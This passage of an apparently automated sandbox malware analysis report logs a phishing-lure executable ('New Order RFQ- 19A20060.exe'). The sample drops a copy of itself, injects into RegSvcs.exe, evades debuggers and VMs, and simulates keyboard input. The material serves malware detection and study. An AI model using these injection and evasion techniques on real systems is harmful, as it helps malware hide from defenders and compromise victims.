              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596840Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596733Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596474Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596284Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593747Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593531Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2473Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7371Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4868Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4968Jump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeAPI coverage: 4.4 %
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeAPI coverage: 4.7 %
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_007A445A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AC6D1 FindFirstFileW,FindClose,0_2_007AC6D1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007AC75C
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AEF95
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AF0F2
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007AF3F3
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A37EF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A3B12
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007ABCBC
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_00FE445A
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEC6D1 FindFirstFileW,FindClose,1_2_00FEC6D1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00FEC75C
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00FEEF95
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00FEF0F2
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00FEF3F3
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00FE37EF
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00FE3B12
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00FEBCBC
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007449A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599653Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599246Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599133Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599030Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598918Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598702Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598263Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597919Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597702Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597264Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597036Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596912Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596541Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596435Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596327Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595999Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595233Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594686Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594568Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594421Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594292Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594184Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599519Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596840Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596733Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596474Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596284Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593747Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593531Jump to behavior
              Source: RegSvcs.exe, 00000003.00000002.3638216843.0000000000C1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
              Source: alarmingness.exe, 0000000A.00000002.1318222088.0000000001194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
              Source: RegSvcs.exe, 0000000B.00000002.3638312956.00000000010A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06499548 LdrInitializeThunk,3_2_06499548
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B3F09 BlockInput,0_2_007B3F09
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00743B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00743B3A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00775A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00775A7C
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00744B37 LoadLibraryA,GetProcAddress,0_2_00744B37
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_01252148 mov eax, dword ptr fs:[00000030h]0_2_01252148
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_012521A8 mov eax, dword ptr fs:[00000030h]0_2_012521A8
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_01250B08 mov eax, dword ptr fs:[00000030h]0_2_01250B08
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_01602530 mov eax, dword ptr fs:[00000030h]1_2_01602530
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_016024D0 mov eax, dword ptr fs:[00000030h]1_2_016024D0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_01600E90 mov eax, dword ptr fs:[00000030h]1_2_01600E90
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_007980A9
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0076A155
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076A124 SetUnhandledExceptionFilter,0_2_0076A124
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FAA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00FAA155
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FAA124 SetUnhandledExceptionFilter,1_2_00FAA124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 86B008Jump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B88008Jump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007987B1 LogonUserW,0_2_007987B1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00743B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00743B3A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007448D7
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A4C7F mouse_event,0_2_007A4C7F
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe" Jump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00797CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00797CAF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0079874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0079874B
              Source: New Order RFQ- 19A20060.exe, alarmingness.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: New Order RFQ- 19A20060.exe, alarmingness.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076862B cpuid 0_2_0076862B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
